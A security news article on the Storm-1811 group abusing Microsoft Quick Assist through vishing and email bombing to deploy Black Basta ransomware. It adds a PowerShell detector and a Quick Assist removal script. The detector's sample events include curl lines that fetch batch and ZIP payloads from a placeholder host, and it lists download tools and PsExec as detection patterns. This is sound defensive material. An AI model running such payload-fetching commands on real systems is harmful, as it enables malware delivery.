
Cybercriminals Exploiting Microsoft’s Quick Assist Feature in Ransomware Attacks

By Newsroom, May 16, 2024. Ransomware / Incident Response

The Microsoft Threat Intelligence team said it has observed a threat it tracks under the name Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks.

“Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware,” the company said in a report published on May 15, 2024.

The attack chain involves the use of impersonation through voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, followed by the delivery of QakBot, Cobalt Strike, and ultimately Black Basta ransomware.

“Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device,” the tech giant said.


Quick Assist is a legitimate Microsoft application that lets a user share their Windows or macOS device with another person over a remote connection, mainly to troubleshoot technical issues on the system. It comes installed by default on devices running Windows 11.

To make the attacks more convincing, the threat actors first launch link listing attacks, a type of email bombing in which the targeted email addresses are signed up for numerous legitimate email subscription services so that subscription content floods their inboxes.

The adversary then phones the target user while masquerading as the company’s IT support team, purporting to offer help with the spam problem, and persuades the user to grant access to their device through Quick Assist.

“Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads,” the Windows maker said.

“Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network.”
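The post-access steps quoted above (a Quick Assist session handing control to a shell, a scripted cURL download of batch or ZIP files, and PsExec for deployment) leave a recognisable trail in process-creation telemetry. The following is an added example, not code from the Microsoft or Rapid7 reports: it runs three simple rules over constructed records shaped like Sysmon Event ID 1 or Security 4688 events with command-line auditing enabled. The field names, hostnames, paths and the sample package path are assumptions; map them to your collector's schema.

```powershell
# Added example: flag the Storm-1811 post-access chain in process-creation events.
# The records below are constructed sample data, not real telemetry.
$events = @(
    [pscustomobject]@{ Time = '2024-05-10T14:02:11Z'; Host = 'WS-017'; User = 'CORP\jdoe'
        ParentImage = 'C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_x64\QuickAssist.exe'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe /c curl.exe -o C:\Users\Public\up.zip http://files.example.invalid/up.zip' }
    [pscustomobject]@{ Time = '2024-05-10T14:02:40Z'; Host = 'WS-017'; User = 'CORP\jdoe'
        ParentImage = 'C:\Windows\System32\cmd.exe'
        Image       = 'C:\Windows\System32\curl.exe'
        CommandLine = 'curl.exe -o C:\ProgramData\stage.bat http://files.example.invalid/stage.bat' }
    [pscustomobject]@{ Time = '2024-05-10T14:05:03Z'; Host = 'WS-017'; User = 'CORP\jdoe'
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\notepad.exe'
        CommandLine = 'notepad.exe C:\Users\jdoe\notes.txt' }
    [pscustomobject]@{ Time = '2024-05-11T02:17:55Z'; Host = 'FS-01'; User = 'NT AUTHORITY\SYSTEM'
        ParentImage = 'C:\Windows\System32\services.exe'
        Image       = 'C:\Windows\PSEXESVC.exe'
        CommandLine = 'C:\Windows\PSEXESVC.exe' }
)

function Find-QuickAssistAbuse {
    param([Parameter(Mandatory)][object[]] $Events)

    # Binaries that should not be launched from inside a Quick Assist session.
    $shells = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'curl.exe', 'certutil.exe', 'bitsadmin.exe')
    # PsExec client binaries and the service it drops on the remote host.
    $psexec = @('psexec.exe', 'psexec64.exe', 'psexesvc.exe')

    foreach ($e in $Events) {
        $parent = [System.IO.Path]::GetFileName([string]$e.ParentImage).ToLowerInvariant()
        $image  = [System.IO.Path]::GetFileName([string]$e.Image).ToLowerInvariant()
        $cmd    = [string]$e.CommandLine
        $rule   = $null

        # Rule 1: Quick Assist handing control to a shell or a download utility.
        if ($parent -eq 'quickassist.exe' -and $image -in $shells) {
            $rule = 'QuickAssist spawned shell/downloader'
        }
        # Rule 2: cURL pulling a batch file or archive (the scripted download in the report).
        elseif (($cmd -match '\bcurl(\.exe)?\b') -and ($cmd -match '\.(bat|cmd|zip)(\s|$|")')) {
            $rule = 'cURL download of batch/ZIP payload'
        }
        # Rule 3: PsExec client or its service binary, used for lateral movement and deployment.
        elseif ($image -in $psexec) {
            $rule = 'PsExec execution'
        }

        if ($rule) {
            [pscustomobject]@{
                Time = $e.Time; Host = $e.Host; User = $e.User
                Rule = $rule;  Evidence = $cmd
            }
        }
    }
}

# Three of the four constructed events match (rules 1, 2 and 3); the Notepad launch does not.
Find-QuickAssistAbuse -Events $events | Format-Table -AutoSize
```

In production, feed the function with events pulled from your SIEM rather than the inline array, and treat rule 1 as the highest-fidelity signal: legitimate help-desk use of Quick Assist rarely needs a command shell at all, so a shell or cURL child of QuickAssist.exe is worth an immediate look even when the download itself is missed.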

Microsoft said it’s taking a close look at the misuse of Quick Assist in these attacks and that it’s working on incorporating warning messages in the software to notify users of possible tech support scams that could facilitate ransomware delivery.

The campaign, believed to have commenced in mid-April 2024, has targeted a variety of industries and verticals, including manufacturing, construction, food & beverage, and transportation, Rapid7 said, indicating the opportunistic nature of the attacks.

“The low barrier of entry into conducting these attacks, coupled with the significant impacts these attacks have on their victims, continues to make ransomware a very effective means to an end for threat actors seeking a payday,” Robert Knapp, senior manager of incident response services at Rapid7, said in a statement shared with The Hacker News.


Microsoft has also described Black Basta as a “closed ransomware offering” rather than a ransomware-as-a-service (RaaS) operation, which comprises a network of core developers, affiliates, and initial access brokers who conduct ransomware and extortion attacks.

It is “distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development,” the company said.

“Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from QakBot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat.”

Organizations are advised to block or uninstall Quick Assist and similar remote monitoring and management (RMM) tools that are not in use, and to train employees to recognize tech support scams.
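The removal recommendation above is straightforward to script. The following is an added example, not code from Microsoft or from the reports cited here; it handles both ways Windows delivers Quick Assist (as a Store app on current Windows 11 builds and as an optional Windows capability on older builds), removes the provisioned copy so new profiles do not get it back, and returns a check you can use in a compliance query. The package and capability names are the ones Microsoft ships under; verify them against your own image before deploying at scale. Run it elevated.

```powershell
# Added example: remove Quick Assist from an endpoint where remote-assistance sessions are not needed.
# Package/capability names are assumed from Microsoft's published names; confirm on your image.
function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()

    # 1. Current builds ship Quick Assist as a Store (Appx) package, installed per user.
    $installed = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
    foreach ($p in $installed) {
        if ($PSCmdlet.ShouldProcess($p.PackageFullName, 'Remove-AppxPackage')) {
            Remove-AppxPackage -Package $p.PackageFullName -AllUsers
        }
    }

    # 2. Remove the provisioned copy so it is not re-installed for every new user profile.
    Get-AppxProvisionedPackage -Online |
        Where-Object DisplayName -eq 'MicrosoftCorporationII.QuickAssist' |
        ForEach-Object {
            if ($PSCmdlet.ShouldProcess($_.PackageName, 'Remove-AppxProvisionedPackage')) {
                Remove-AppxProvisionedPackage -Online -PackageName $_.PackageName | Out-Null
            }
        }

    # 3. Older builds deliver Quick Assist as an optional Windows capability instead.
    $caps = Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' |
        Where-Object State -eq 'Installed'
    foreach ($c in $caps) {
        if ($PSCmdlet.ShouldProcess($c.Name, 'Remove-WindowsCapability')) {
            Remove-WindowsCapability -Online -Name $c.Name | Out-Null
        }
    }
}

function Test-QuickAssistPresent {
    # Returns $true when any Quick Assist installation path is still present; use as a compliance check.
    $appx = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
    $cap  = Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' |
        Where-Object State -eq 'Installed'
    return [bool]($appx -or $cap)
}

Remove-QuickAssist -WhatIf     # dry run; drop -WhatIf to apply the change
Test-QuickAssistPresent        # expected: $False once removal has been applied
```

Where Quick Assist must stay available for a help-desk team, an application control policy (AppLocker or WDAC) scoped to that team is a better fit than removal, and the same compliance function can then confirm the app is absent everywhere else. Either way, pair the technical control with the user training the article recommends, since the call that opens the session is the part no configuration change can block.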
